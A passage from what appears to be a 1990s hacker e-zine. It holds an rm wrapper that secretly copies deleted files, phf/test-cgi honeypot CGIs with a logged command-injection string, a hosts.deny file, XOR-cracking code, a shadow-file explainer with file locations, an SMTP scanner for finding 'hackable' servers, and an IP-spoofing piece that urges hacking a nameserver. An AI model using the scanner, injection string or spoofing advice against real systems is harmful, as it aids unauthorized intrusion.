setenv("PROGRAM", argv[2], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-i",argv[2],NULL);
}
}
force:
for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-f",argv[i],NULL);
unsetenv("PROGRAM");
}
verbose:
for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-v",argv[i],NULL);
unsetenv("PROGRAM");
}
recursive:
for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-r",argv[i],NULL);
unsetenv("PROGRAM");
}
rf:
for (i=2;i<argc;i++)
{
lstat(argv[i], &filestats);
if (S_ISDIR(filestats.st_mode))
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-rf",argv[i],NULL);
}
else
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-rf",argv[i],NULL);
}
}
ri:
for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-ri",argv[i],NULL);
unsetenv("PROGRAM");
}
rv:
for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-rv",argv[i],NULL);
unsetenv("PROGRAM");
}
rfv:
for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-rfv",argv[i],NULL);
unsetenv("PROGRAM");
}
}
This program can of course be improved, especially replacing the strcmp's
with getopt() but I could care less....
Now when ever a user deletes something it will first be copied to
/tmp/fill before it's deleted.
Now, even though it's logged to /var/log/httpd/access_log, I'd like to
know right away when someone tries to use the phf or test-cgi
vulnerabilities on me. So I replaced the phf and test-cgi programs in my
/cgi-bin/ with this. The first will get the info on who it is, then it
will send a fake passwd file. This can be improved of course but I don't
care to take the time.
phf.c:
/* ----------------------------------------------------- */
/* phf "trojan" by (--==+*~Shok~*+==--) */
/* ----------------------------------------------------- */
/* Email: shok@sekurity.org */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
void main()
{
FILE *tmpfile, *fingerinfo;
char *host, *addr, *browser, *query_string;
char fingerbuf[2048];
host=getenv("REMOTE_HOST");
addr=getenv("REMOTE_ADDR");
browser=getenv("HTTP_USER_AGENT");
query_string=getenv("QUERY_STRING");
/* This is to prevent a finger war, the ip address below is my ip address */
/* just to be on the safe side. But I do have in.fingerd: LOCAL to allow */
/* me to finger without starting a finger war. */
if ((strcmp(addr, "206.71.69.243")) || (strcmp(addr,"127.0.0.1")) == 0) exit(0);
system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo1");
tmpfile=fopen("/var/tmp/.phf", "w");
fingerinfo=fopen("/var/tmp/.fingerinfo1", "r");
fprintf(tmpfile, "The following person used phf!!\n\n");
fprintf(tmpfile, "\tHost: %s\n", host);
fprintf(tmpfile, "\tAddress: %s\n", addr);
fprintf(tmpfile, "\tBrowser type: %s\n", browser);
fprintf(tmpfile, "\tQuery String (aka command entered): %s\n\n", query_string);
fingerinfo=fopen("/var/tmp/.fingerinfo1", "r");
fgets(fingerbuf, 2047, fingerinfo);
fclose(fingerinfo);
fprintf(tmpfile, "I did a finger of the person trying to exploit us:\n");
fprintf(tmpfile, "--------------------------------------------------\n");
fputs(fingerbuf, tmpfile);
fclose(tmpfile);
system("mail -s \"SOMEONE USED phf!!\" root </var/tmp/.phf");
unlink("/var/tmp/.fingerinfo1");
unlink("/var/tmp/.phf");
printf("Content-type: text/html\n\n");
printf("<H1>Query Results</H1>\n");
printf("<P>\n");
printf("/usr/local/bin/ph -m alias=x \n");
printf("cat /etc/passwd\n");
printf("<PRE>\n");
printf("root:TQoabYuFUSoSk:0:1:Operator:/:/bin/csh\n");
printf("nobody:*:65534:65534::/:\n");
printf("daemon:*:1:1::/:\n");
printf("sys:*:2:2::/:/bin/csh\n");
printf("bin:*:3:3::/bin:\n");
printf("uucp:*:4:8::/var/spool/uucppublic:\n");
printf("news:*:6:6::/var/spool/news:/bin/csh\n");
printf("ingres:*:7:7::/usr/ingres:/bin/csh\n");
printf("mail:*:8:12::/:\n");
printf("johnny:Abx4dgSg:MaTr|x:/home/MaTrix:/bin/sh\n");
printf("audit:*:9:9::/etc/security/audit:/bin/csh\n");
printf("sync::1:1::/:/bin/sync\n");
printf("kill8r:AfBs45Syf:100:25:Siko:/home/Siko:/bin/sh\n");
printf("ppp::70:70:PPP login:/tmp:/etc/ppplogin\n");
printf("sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag\n");
printf("sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag\n");
printf("ftp:*:10:20:ftp:/home/ftp:/usr/bin/bash\n");
printf("luseruser:xAFjgodjFa4:254:100:Pr0t0:/home/Pr0t0c0l:/bin/sh\n");
printf("babum:aDtg3Gs645:BiT-#hacker:454:100:/home/BiT:/bin/sh\n");
printf("www:*:30:30:World Wide Web:/home/www:/usr/bin/bash\n");
printf("pop:*:70:70:Post Office Protocol:/var/spool/pop:/usr/bin/bash\n");
printf("zirzlaff:.a6RPNtUhGW0k:3190:100:Torsten Zirzlaff:/home/tz:/usr/local/bin/tcsh\n");
printf("f33r:A23gAdcYf5:4110:100:f33r me bitch:/home/hph:/usr/local/bin/tcsh\n");
printf("henrik:v50YvKjFwWw.M:4120:18:HeNriK:/usr/sirius/henrik:/usr/bin/bash\n");
printf("inas:fStcY3^gf:8900:100:InaSaLoser:/home/is:/usr/local/bin/tcsh\n");
printf("ivo:*:8920:100:Da Tru hacker-Lamer:/home/ivo:/usr/local/bin/tcsh\n");
printf("pcguest::7454:100:Temp hax0r account:/tmp:/usr/bin/sh\n");
printf("simone:Em8y0pwT.5umo:8930:100:Simone Kleine:/home/simone:/usr/bin/bash\n");
printf("shko:aDrsBsefYr:666:100:SHLRP:/home/shok:/bin/bash\n");
printf("majordomo:*:405:20:Majordomo server:/dev/null:/bin/startdomo\n");
printf("listserv:*:567:20:Listserv server:/dev/null:/bin/sh\n");
printf("hammer:FwhX26Hf1:8940:100:Peter Hammerstein:/home/hammer:/usr/bin/bash\n");
printf("patrick:cYz7MXTIyGByQ:8950:100:Patrick Mergell:/home/patrick:/usr/bin/bash\n");
printf("chr:T/SRcchg0fK3I:8960:100:Christian Zemlin:/home/chr:/usr/bin/bash\n");
printf("db:*:8970:100:Dieter Beule:/usr/sirius/dieter:/usr/bin/bash\n");
printf("guest:AefxF2a2D:8999:110:Guest:/home/guest:/usr/local/bin/tcsh\n");
printf("</PRE>");
}
This is what the above will show up in the root's mail:
The following person used phf!!
Host: ts037d12.chi-il.concentric.net
Address: 206.173.188.168
User (if able): (null)
Ident (if able): (null)
Browser type: (null)
Query String (aka command entered): Qalias=X%0aid
I did a finger of the person trying to exploit us:
--------------------------------------------------
[206.173.188.168]
(probably Win95 which is why there was no output as Win95 doesn't have an
actual "finger" program)
Now for the test-cgi...this does the same thing accept it will send a
"File Not found" instead:
test-cgi.c:
/* --------------------------------------------------- */
/* test-cgi.c -- test-cgi "trojan" by --==+*~Shok~+*-- */
/* --------------------------------------------------- */
/* Email: shok@sekurity.org */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
void main(void)
{
FILE *tmpfile, *fingerinfo;
char *host *addr, *browser, *query_string;
char fingerbuf[2048];
host=getenv("REMOTE_HOST");
addr=getenv("REMOTE_ADDR");
browser=getenv("HTTP_USER_AGENT");
query_string=getenv("QUERY_STRING");
/* This is to prevent a finger war, for safety, even though you SHOULD */
/* have in.fingerd: LOCAL in your hosts.allow */
if ((strcmp(addr, "206.71.69.243")) || (strcmp(addr,"127.0.0.1")) == 0) exit(0);
system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo");
tmpfile=fopen("/var/tmp/.test-cgi", "w");
fprintf(tmpfile, "The following person used phf:\n\n");
fprintf(tmpfile, "\tHost: %s\n", host);
fprintf(tmpfile, "\tAddress: %s\n", addr);
fprintf(tmpfile, "\tBrowser type: %s\n ", browser);
fprintf(tmpfile, "\tQuery String (aka command entered): %s\n\n", query_string);
fingerinfo=fopen("/var/tmp/.fingerinfo", "r");
fgets(fingerbuf, 2047, fingerinfo);
fclose(fingerinfo);
fprintf(tmpfile, "I did a finger of the person trying to exploit us:\n");
fprintf(tmpfile, "--------------------------------------------------\n");
fputs(fingerbuf, tmpfile);
fclose(tmpfile);
/* REPLACE THIS PART WITH WHO YOU WANT TO MAIL IT TO change the root to */
/* to whatever you want */
system("mail -s \"SOMEONE USED test-cgi!!\" root < /var/tmp/.test-cgi");
unlink("/var/tmp/.fingerinfo");
unlink("/var/tmp/.test-cgi");
printf("Content-type: text/html\n\n");
printf("<h2>File Not found\n</h2>");
printf("The requested URL /cgi-bin/test-cgi was not found on this server.");
}
Just as an added bonus here.........
When someone goes to a directory you have .htaccess in, it will send 401,
which is the unauthorized error code (pretty sure it's 401 but not in the
mood to check). Now I editted my srm.conf (usually
/usr/local/etc/httpd/conf/srm.conf), and added this line:
ErrorDocument 401 /cgi-bin/unauthorized.cgi
This is basically like the one above.......except it differs
by the the 'user' part, which lets you know what user it was...this is a
good way to know if there is an unauthorized attempt, and/or what user is
logging into your webpage that is secured......
unauthorized.c:
/* -------------------------------------------------------- */
/* Unauthorized cgi "trojan" script by (--==+*~Shok~*+==--) */
/* -------------------------------------------------------- */
/* Email: shok@sekurity.org */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
void main(void)
{
FILE *tmpfile, *fingerinfo;
char *host, *addr, *user, *ident, *browser, *query_string;
char fingerbuf[2048];
host=getenv("REMOTE_HOST");
addr=getenv("REMOTE_ADDR");
user=getenv("REMOTE_USER");
ident=getenv("REMOTE_IDENT");
browser=getenv("HTTP_USER_AGENT");
query_string=getenv("QUERY_STRING");
/* This can get ugly */
if ((strcmp(addr, "206.71.69.243"))==0) exit(0);
system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo");
tmpfile=fopen("/var/tmp/.unauthorized", "w");
fprintf(tmpfile, "The following person has unauthorized access:\n\n");
fprintf(tmpfile, "\tHost: %s\n", host);
fprintf(tmpfile, "\tAddress: %s\n", addr);
fprintf(tmpfile, "\tUser (if able): %s\n", user);
fprintf(tmpfile, "\tIdent (if able): %s\n", ident);
fprintf(tmpfile, "\tBrowser type: %s\n ", browser);
fingerinfo=fopen("/var/tmp/.fingerinfo", "r");
fgets(fingerbuf, 2047, fingerinfo);
fclose(fingerinfo);
fprintf(tmpfile, "I did a finger of the person:\n");
fprintf(tmpfile, "-----------------------------\n");
fputs(fingerbuf, tmpfile);
fclose(tmpfile);
system("mail -s \"Somone tried unauthorized access\" root </var/tmp/.unauthorized");
unlink("/var/tmp/.fingerinfo");
unlink("/var/tmp/.unauthorized");
printf("Content-type: text/html\n\n");
printf("<HEAD><TITLE>Unauthorized</TITLE></HEAD>");
printf("<BODY><H1>Unauthorized</H1>");
printf("You are unauthorized and unwanted here.\n Go away <FONT COLOR=\"red\">d0rk</FONT><P>");
printf("</BODY>");
}
Here is my hosts.deny too.........in case you wanted to see it ;)
ALL: .cc.edu: /bin/mail -s "%h from CC.EDU tried to access us!!" root
ALL: .gov, .mil: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "GOV/MIL ATTEMPTED ACCESS from %h!! Using %s." root &
in.telnetd: ALL: /bin/mail -s "%h tried to telnet in" root
#FINGER - Noisy people
#------------
in.fingerd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FINGER ATTEMPT FROM %h" root &
#Security reasons
#---------------
in.ftpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FTP ATTEMPT FROM %h" root &
in.rlogind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RLOGIN ATTEMPT FROM %h" root &
#in.telnetd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "TELNET ATTEMPT FROM %h" root &
# PORTMAP
#-------------
portmap: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "PORTMAP ATTEMPT FROM %h. Using %s" root &
#COMSAT
in.comsat: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "COMSAT ATTEMPT FROM %h" root &
#REXECD
in.rexecd: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "REXEC ATTEMPT FROM %h" root &
#RSHD
in.rshd: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RSHD ATTEMPT FROM %h" root &
#NNRPD
in.nnrpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "NNRPD ATTEMPT FROM %h" root &
#RPCBIND
rpcbind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RPCBIND ATTEMPT FROM %h. Using %s" root &
#ALL: paranoid
Well.......................................we're winding down to the end.
It has been fun and I don't have much more to say on this article.
Thanks for reading, please feel free to use and distribute this, although
I wish for you to leave my comments and "header" at the tops ... ya know
my "copyright" :)
You can access a few of my things at ftp.janova.org (in pub) or
www.janova.org.
������������������������������������������������������������������������������
Cryptanalytic Attacks on Repeating Key Algorithms
by The Messiah
CONTENTS:
* Introduction
* Background
* Methods Of Attack
* BadCrypt v1.0
* GeneriCrack for DOS v1.0
* Prevention
INTRODUCTION:
Bruce Schneier published an essay called "Why Crypto Is Harder Than It
Looks." It's true, designing a secure algorithm is MUCH harder than breaking
one. This article is about breaking programs which use a repeating key.
Credit should go out to Kent Briggs, whose WinCrack program opened doors for
me into cryptanalysis. His code is also at the heart of GeneriCrack for DOS,
altered quite a bit, however.
BACKGROUND:
What is cryptanalwhatever? Cryptanalysis is the art of decoding
encrypted messages without the key, or algorithm. In 1994, PC Mag released a
program by Jeff Prosise called WinCrypt. It created a 512-byte block derived
from a passphrase, then XOR'd (eXclusive OR) each 512-byte block of the
plaintext with the key block.
|------Key Block-----|
XOR
|------Plaintext-----|--------------------|--------------------|--------------------|
equals
|-----Ciphertext-----|
|------Key Block-----|
XOR
|--------------------|------Plaintext-----|--------------------|--------------------|
equals
|--------------------|-----Ciphertext-----|
And so on, until the plaintext is completely XOR'd with the key block. The
problem with this is that is you have a file of all 'A's (Ordinal value=65),
there will be visible repeating patterns in the ciphertext- A PROBLEM! Why is
that a problem, you ask? Someone would have to find that huge 512-byte key to
decrypt it, right? Errnt.
METHODS OF ATTACK:
WinCrypt's weakness is that it uses the same key byte at known points
in the file. The 1st, 513th, 1025th, 1537th, etc byte is always XOR'd with
the same byte of the key. The other bytes in the key have no role in the
encryption of the 1st byte. If the 1st byte of the file is an 'A', and they
1st byte in the key is a 'B', then the result will be a byte value of 3,
regardless of what the other entries in the key are. So instead of a 512-byte
key, it's actually 512 1-byte keys. The keyspace for a 512-byte key would be
2^4096 possibilities, but 512 1-byte keys is just 512*256 (number of entries)
(number of values per entry). 131072 possible keys is quite a bit less to
search. But we don't have to stop there. If we know some common byte values
in the plaintext, we can search for those, like this:
for i = 1 to 512 do
begin
for j = 0 to 255 do
if (InBlock[i] xor j) is in CommonValues then Increment(Count[j]);
end
The highest count will be the byte that has the most hits inside the target
byte range. Text files are made up of mostly spaces (ordinal value 32), CR/LF
pairs (13/10), and lower case letters (well, some l33t0 ph|l3z might have
different values, but hey...).
BADYCRYPT v1.0:
(*
BadCrypt v1.0 by The Messiah
This program takes a 256-byte array, fills it with the output of a
PRNG seeded with the passphrase, then uses the aforementioned
encryption method.
program BadCrypt;
uses Crt;
type
TKey = array[1..256] of byte;
var
key : TKey;
passphrase, inpath, outpath : String;
procedure Crypt(infile, outfile : String);
var
FromF, ToF: file;
NumRead, NumWritten, I: Integer;
Buf: array[1..256] of byte;
begin
Write('Crypting');
Assign(FromF, infile);
Reset(FromF, 1);
Assign(ToF, outfile);
Rewrite(ToF, 1);
repeat
BlockRead(FromF, Buf, SizeOf(Buf), NumRead);
for i := 1 to NumRead do
Buf[i] := Buf[i] xor Key[i];
BlockWrite(ToF, Buf, NumRead, NumWritten);
Write('.');
until (NumRead = 0) or (NumWritten <> NumRead);
Close(FromF);
Close(ToF);
WriteLn('Done!');
end;
procedure Expand(seed : String; var aKey : TKey);
var
I, J : Integer;
begin
Write('Expanding key');
for i := 1 to Length(seed) do
begin
RandSeed := Ord(seed[i]);
for j := 1 to 256 do
aKey[j] := aKey[j] xor Random(256);
Write('.');
end;
WriteLn('Done!');
end;
begin
WriteLn('BadCrypt v1.0: The Worst Encryption Utility!');
Write('Enter the password: ');
ReadLn(passphrase);
Write('Enter the filepath for the input file: ');
ReadLn(inpath);
Write('Enter the filepath for the output file: ');
ReadLn(outpath);
Expand(passphrase, Key);
Crypt(inpath, outpath);
WriteLn('Hit enter to quit...');
ReadLn;
end.
{ ------------------------------------------------------ }
GENERICRACK V1.0:
(*
GeneriCrack v1.0 for DOS by The Messiah
This cracks files, if you know the key size it was encrypted with.
A 32-bit version will be out soon, so stick around...
program GeneriCrack;
const
MAXKEY = 1024;
var
key, buffer : array[1..MAXKEY] of Byte;
count, maxcount : array[1..MAXKEY] of Integer;
inpath, outpath : String;
kSize : Integer;
procedure Crack(Filename : String; keysize : Integer);
var
file1: file;
i,j, result: integer;
b : byte;
begin
Write('Cracking');
Assign(file1,Filename);
Reset(file1,1);
for i := 1 to KeySize do
begin
key[i] := 0;
maxcount[i] := 0;
end;
for i:=0 to 255 do
begin
seek(file1,0);
for j := 1 to KeySize do
count[j] := 0;
while not eof(file1) do
begin
blockread(file1,buffer,keysize,result);
for j:=1 to result do
begin
b:= i xor buffer[j];
if b in [10,13,32,97..122] then count[j] := count[j] + 1;
end;
end;
for j:=1 to keysize do if count[j]>maxcount[j] then
begin
key[j]:=i;
maxcount[j]:=count[j];
end;
Write('.');
end;
WriteLn('Done!');
close(file1);
end;
procedure Decrypt(infile, outfile : String; keysize : Integer);
var
file1,file2: file;
i,j, result: integer;
begin
Write('Decrypting');
assign(file1,infile);
reset(file1,1);
assign(file2,outfile);
rewrite(file2,1);
while not eof(file1) do
begin
blockread(file1,buffer,keysize,result);
for j:=1 to result do buffer[j]:= buffer[j] xor key[j];
blockwrite(file2,buffer,result,i);
Write('.');
end;
close(file1);
close(file2);
WriteLn('Done!');
end;
begin
WriteLn('GeneriCrack for DOS v1.0 by The Messiah');
Write('Enter the keysize in bytes: ');
ReadLn(kSize);
Write('Enter the filepath of the input file: ');
ReadLn(inpath);
Write('Enter the filepath of the output file: ');
ReadLn(outpath);
Crack(inpath, kSize);
WriteLn;
Decrypt(inpath, outpath, kSize);
WriteLn;
WriteLn('Hit enter to quit...');
ReadLn;
end.
{ ------------------------------------------------------ }
PREVENTION:
One way to make sure an algorithm you're designing (or using) isn't
fallible to this particular attack is to make the encryption data-sensitive.
Have the key change with each block. This will not, of course, make a bad
algorithm good, but it will make it resistant to this particular attack.
Also, if you're running a block cipher in ECB mode, it could be broken with
this attack, AFAIK. I haven't tested it yet, but ECB does the same method for
each block.
������������������������������������������������������������������������������
Shadow files explained
by Shypht
Ok, a few people I knew / know were a bit confused on the purpose on having
a shadowed password file so I decided to write a simple text explaining
them.
-[ ---------------------------------------------------------------------- ]-
۲�� Introduction : the basic's ����
-[ ---------------------------------------------------------------------- ]-
A shadow file is a way of adding extra security to a unix machine. Before
password shadowing, a passwd file would look like this :
( this is in /etc/passwd )
esmith:s920Vk02sl24:6151:100:Edmond Smith:/home/esmith:/bin/bash
| | | | | | |
| | | | | | \- which shell they
| | | | | \- home dir use7
| | | | \- real name/comments/bussiness etc
| | | \- group id (gid)
| | \- user id(uid)
| \- encrypted password
\--- login name
but now with computer security becoming more and more of an issue, and more
and more people were grabing the /etc/passwd file and crack the encrypted
password w/ a word list and a cracker like brute force or cracker jack,
john the ripper,crack, etc. The reason why a wordlist/dictionary file
is used is because the encrypted password uses a one-way hash. To crack
the password, the cracker compares the one-way hash from each word in the
word list to the encrypted password until a match is found.
So they decided they needed more security, so they started to shadow
their password files, they still look pretty much the same, but instead
of having the encrypted password, there is a * in place, so if you were
to cat /etc/passwd you'd get :
( location varies on systems see further down for more info )
esmith:*:6151:100:Edmond Smith:/home/esmith:/bin/bash
^- shadowed password file, not much use eh?
people may wonder why wouldn't the system admins make the /etc/passwd
read-only by root and it'd save them alot of hassle, but programs need to
read certain info from that file to get user name / uid / gid etc, and
since not all programs are run as root, if the /etc/passwd was read by root
only, it would cause conflicts, and alot of programs would have to be run
as root and create alot of security problems. So the actual encrypted
password is held in the shadow file, for a list of locations see below,
this file is / should only be read/write only by the root admins, this
gives an extra ammount of security, and since only root can read it, normal
users can't grab a copy and crack the password's in it. The format of the
shadow file goes as :
username:password:change_date:min_change:max_change:warn:inactive:expire:
the format will go into more detail in the next section.
-[ ---------------------------------------------------------------------- ]-
۲�� The Shadow File : The Format ����
-[ ---------------------------------------------------------------------- ]-
As stated above the format of the shadow file goes as :
username:password:change_date:min_change:max_change:warn:inactive:expire:
User Name : the name of the user
Password : the encrypted password. And/or alternate authontication
methods wich will be explained in the next section.
[ - the following fields relate to passwd change / expiration - ]
Change Date : encodes the date of the most rescent passowrd chage
Min/Max Change : tells the min and max days between password changes
Warn : when the password is about to expire, warn that many
days ahead of time
Inactive : specifies how many days the user has to change thier pass
after the expiration date before that account is cancled
Expire : encodes the date that the password will expire
-[ ---------------------------------------------------------------------- ]-
۲�� The Shadow File : Extra Features ����
-[ ---------------------------------------------------------------------- ]-
( I read some of this stuff in a document relating to linux security so I am
not sure if it applys to all shadowing systems but I am pretty sure that
it does / or at least should. If not it is still something that is
interesting to know. )
In the password field of the shadow file you can also specify additional
authentication programs to be run after the password has been entered. An
example of one is :
shypht:4j3jx70735;@/sbin/agetest::::::
the ;@/sbin/agetest would tell the system that after the password has been
enter'd in correctly to run the /sbin/agetest program, which I just made up
for an example, and it would return a 0 or 1 showing if the user passed
shypht:<\@>/sbin/securelogin::::::
which the user would have to pass to gain entry to the system,
and he/she would not be prompted for a password. This can be used for lower
or higher security on a system, but I would imagine that it would only be
used to secure the system even more, you could have them prompted for
personal questions which only they would know etc.
-[ ---------------------------------------------------------------------- ]-
۲�� The Shadow File : Locations ����
-[ ---------------------------------------------------------------------- ]-
The location of the shadow file varies from system to system, I have taken
this list from the ultimate beginers guide to hacking 97 revision. And is
modified for this document.
UNIX Path
-------------------------------------------------
AIX 3 /etc/security/passwd or /tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Reno /etc/master.passwd
ConvexOS 10 /etc/shadpw
ConvexOS 11 /etc/shadow
DG/UX /etc/tcb/aa/user/
EP/IX /etc/shadow
HP-UX /.secure/etc/passwd
IRIX 5 /etc/shadow
Linux1.1 /etc/shadow
OSF/1 /etc/passwd[.dir|.pag]
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag]
UNICOS /etc/udb
Unix System V /etc/master.passwd
-[ ---------------------------------------------------------------------- ]-
۲�� Closing Comments ����
-[ ---------------------------------------------------------------------- ]-
I hope that this document helpfull to anyone out there. I wrote this to
help people understand, and maybe learn abit more about the shadow file.
Thanks for reading this far - shypht
-[ ---------------------------------------------------------------------- ]-
۲�� The End ����
-[ ---------------------------------------------------------------------- ]-
greetz out to : vacuum, cellular fear, philisopher, exorcist, atom, RM,
severed, all my friends in #hackphreak, PentiumRU, Nyangel,
Rloxley, X-Bish and all the other ops, and #carparts and
anyone else I forgot
thanx to vacuum for fixin some spelling and adding the 1way hash info.
������������������������������������������������������������������������������
SMTP server scanner
by memor
/*
Here is a SMTP server scanner (thoses ones on port25)
to scan i guess for old mailserver, for easy sendmail bugs uses.
well.. this is not really an hacking tool.. only a scanning one.
it can be used in 2 ways..
USAGE:
smtpscan -dh xxx.xxx[.xxx](if option -h) [port](optional)
first.. to find "possible" hackable domains like that :
smtpscan -d xxx.xxx or smtpscan -d xxx.xxx 25
will scan for smtp from xxx.xxx.1.1 to xxx.xxx.255.1
and 2ndly, it can be used to find "possible" hackable servers on
a domain with :
smtpscan -h xxx.xxx.xxx or smtpscan -h xxx.xxx.xxx 25
will scan for smtp from xxx.xxx.xxx.1 to xxx.xxx.xxx.255
you can scan for any domains or servers with another port (like for pop3 or
other) with smtpscan -dh xxx.xxx.xxx[.xxx] port
thanx to Wintifax for his advices ;)
memor@mygale.org
memor(hbs) Aug 29, 1997
/* habitual includes for managing functions in the programm */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <netinet/in.h>
/* defining global variables for reading writing creating the socket */
FILE *soc;
int sock;
/* defining void answer(void) function */
void answer();
/* main routing */
int main(argc,argv)
int argc;
char **argv;
{
/* create variables for counting , ip adress string */
int count, port = 25;
char *ips;
struct sockaddr_in ip;
ips = (char *)malloc(100);
/* checking if enough arguments to make the programm working correctly */
if(argc<2)
{
/* if not, tells the usage and quit */
printf("%s - memor/hbs\n",argv[0]);
printf("usage:\n");
printf("%s -dh xxx.xxx[.xxx] [port]\n",argv[0]);
exit(1);
}
else if(argc>3) port = atoi(argv[3]);
/* begining -d or -h scan */
for(count=1;count<256;count++)
{
if(strcmp(argv[1],"-d")==0) sprintf(ips,"%s.%i.1",argv[2],count);
else sprintf(ips,"%s.%i",argv[2],count);
printf("Looking at %s Port %i\n",ips,port);
/* creating socket */
if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) /* i cant open it */
{
/* i cant, i write what error it gives me */
perror("socket");
} else {
soc=fdopen(sock, "r");
ip.sin_family = AF_INET;
ip.sin_port = htons(port);
ip.sin_addr.s_addr = inet_addr(ips);
bzero(&(ip.sin_zero),8);
/* trying to connect..reach the host */
if ( connect(sock, (struct sockaddr *)&ip, sizeof(struct sockaddr)) < 0 )
{
/* i cant, i write what error it gives me */
perror("connect");
} else {
/* getting what the smtp tells me */
answer();
}
/* closing that socket */
close(sock);
}
}
}
/* answering function */
void answer()
{
/*creating a as char type.. */
char ch;
do
{
ch=getc(soc);
printf("%c",ch);
/* i write the cararcter i received */
}
while(ch!='\r');
/* received a 13 .. go back to main() */
printf("\n");
}
������������������������������������������������������������������������������
All About The Internet Protocol
by Malhavoc
Lets start off with the basics of ip's then we will start on some of the
advanced stuff like ip spoofing and masquerading.
First off Ip is short for Internet Protocol. The Internet Protocol defines
how data should be broken down to be transmitted over the internet. Another
part of the Internet Protocol is the Internet Protocol address or IP Address.
The Ip address is a 32-bit number with 4 digits ranging from 0 to 255. The
IP address is similar to your home address in that it is an identifier much
like your home address, except that the ip address identifies each computer
connected or linked to the internet.
Ip addresses can be resolved to domain names and visa versa through DNS which
stands for Domain Name Server or name server for short. Each domain has a
unique IP address assigned to it. Ip can have multiple domain names assigned
to it.
The Ip address also has 4 layers associated with it. They are:
The Application Layer - This deals with the functions of server
applications like FTP and HTTP.
The Transmission Control Protocol Layer - This controls the moving of data
from the source to the
destination ignoring everything
else.
The Internet Protocol Layer - This handles all of the moving data from one
network node to the next.
The Physical Layer - This controls all of the actual communications
hardware such as ethernet cards and modems.
These layers are known as the protocol stack.
Without IPs you can't find any computer on the internet. Something else
associated with the Ip is something called TCP or Transmission Control
Protocol. This basically controls what the ip transmits and recieves to
and from other computers.
There are also 2 types of IPs. They are the Dynamic and the Static ip.
The dynamic ip is an ip that always changes. Sometimes the last 2 digits
are the same, but most of the time the last digit stays the same. The
static ip on the otherhand is the same all of the time, hence the word
static.
As you can see the IP has many functions throughout the internet and if
you mess around with them in the wrong way, you could certainly screw up many
computers, even a whole network up.
How do you do this you ask? READ ON!
In the previous paragraph I said that if you fuck around with an IP or a
computer that is connected to a very large LAN, Network, or Intranet you
could really screw things up quite a bit. There are many ways of doing
this. Some more fun than others. You could hack a system and crontab
shutdown -h now to run every 15 minutes or nuke a server and lag it to
hell, but that could totally cripple a system, and that is not what I like
to condone. What I really like is spoofing. Although it does not screw up
anything it can give you unauthorized access to things or you could just
make your ip and/or domain to whatever you want. Spoofing is not very
hard if you know what you are doing. If you read my explanation of the IP
it explained all about IPs. If you remember everything that I explained
it can help you in your quest to spoof, or you could continue to read this
and learn how to spoof by my teachings.
To do a basic spoof on IRC or something you just need root on a
nameserver and jizz. In case you are saying, "What the hell is a
nameserver?", I have included a quick little definition, if you will of a
nameserver.
A nameserver is pretty much a computer that translates the
alphabetic domain name to a numerical IP address.
To get root on a nameserver you either have to:
a) Get unauthorized access to the system, anotherwards hack the system
b) You already own a nameserver connected to the internet
If you would like to use option "a" to get access, you need to find
another file specifically written about hacking(which I am positive I will
write at some point).
or if you chose "b", can I get access?(it was a joke but if i can, e-mail
me at malhavoc@xxedgexx.com) but seriously if you do have one, perfect.
All you need to do now is download jizz. You could download it at my
website at Http://Kaos.xxedgexx.com or go to Http://www.rootshell.com.
Once you download it type gcc -o jizz jizz.c, after that, jizz should
compile in the directory you download to. After the compilation is
complete type ./jizz
Manually Spoofing - The more advanced way to spoof
and for use with people that actually know something.
������������������������������������������������������������������������������
ShokDial - a linux war dialer
by Shok
I wrote this because someone asked me to, and it's the only war
